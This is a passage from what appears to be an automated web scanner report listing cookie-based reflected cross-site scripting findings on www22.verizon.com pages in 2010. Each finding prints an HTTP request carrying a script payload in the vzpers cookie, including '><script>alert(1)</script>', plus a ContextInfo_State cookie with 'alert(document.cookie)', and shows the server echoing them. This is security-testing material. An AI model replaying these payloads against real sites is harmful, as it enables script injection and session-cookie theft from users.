Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TXbc1c1<script>alert(1)</script>1aae131b655; CP=null*; canigetfios=Y; showpromo=N; refURL=http://www22.verizon.com/; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115030
Expires: Mon, 13 Dec 2010 00:40:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:45 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:45:45 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXBC1C1<SCRIPT>ALERT(1)</SCRIPT>1AAE131B655 </DIV>
...[SNIP]...

1.148. http://www22.verizon.com/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 205cc<script>alert(1)</script>24dd7f8344c was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX205cc<script>alert(1)</script>24dd7f8344c; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65159
Expires: Mon, 13 Dec 2010 00:58:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX205CC<SCRIPT>ALERT(1)</SCRIPT>24DD7F8344C </DIV>
...[SNIP]...

1.149. http://www22.verizon.com/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e59fe'><script>alert(1)</script>34aec5a8001 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_dp_fi_uc/fiosbundles_dp_fi_uc.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXe59fe'><script>alert(1)</script>34aec5a8001; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65163
Expires: Mon, 13 Dec 2010 00:58:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE59FE'><SCRIPT>ALERT(1)</SCRIPT>34AEC5A8001 ' />
...[SNIP]...

1.150. http://www22.verizon.com/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b24ee'><script>alert(1)</script>2453c968171 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb24ee'><script>alert(1)</script>2453c968171; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68156
Expires: Mon, 13 Dec 2010 00:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB24EE'><SCRIPT>ALERT(1)</SCRIPT>2453C968171 ' />
...[SNIP]...

1.151. http://www22.verizon.com/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 4a20a<script>alert(1)</script>bec38fb087e was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/fiosbundles_tp_fi_tv_extremehd/fiosbundles_tp_fi_tv_extremehd.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX4a20a<script>alert(1)</script>bec38fb087e; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 66610
Expires: Mon, 13 Dec 2010 00:58:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:58:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:58:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4A20A<SCRIPT>ALERT(1)</SCRIPT>BEC38FB087E </DIV>
...[SNIP]...

1.152. http://www22.verizon.com/residential/bundles/landing/fios_dp.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_dp.html

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 3f4ec<script>alert(1)</script>6f8b4c3d6d2 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_dp.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX3f4ec<script>alert(1)</script>6f8b4c3d6d2; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67361
Expires: Mon, 13 Dec 2010 00:57:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3F4EC<SCRIPT>ALERT(1)</SCRIPT>6F8B4C3D6D2 </DIV>
...[SNIP]...

1.153. http://www22.verizon.com/residential/bundles/landing/fios_dp.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_dp.html

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77415'><script>alert(1)</script>23ef036d4d7 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_dp.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX77415'><script>alert(1)</script>23ef036d4d7; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67365
Expires: Mon, 13 Dec 2010 00:57:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:01 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX77415'><SCRIPT>ALERT(1)</SCRIPT>23EF036D4D7 ' />
...[SNIP]...

1.154. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c12fb'><script>alert(1)</script>c6597bba6ad was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXc12fb'><script>alert(1)</script>c6597bba6ad; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68225
Expires: Mon, 13 Dec 2010 00:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC12FB'><SCRIPT>ALERT(1)</SCRIPT>C6597BBA6AD ' />
...[SNIP]...

1.155. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 534fb<script>alert(1)</script>f563fbd5e46 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX534fb<script>alert(1)</script>f563fbd5e46; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68221
Expires: Mon, 13 Dec 2010 00:57:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
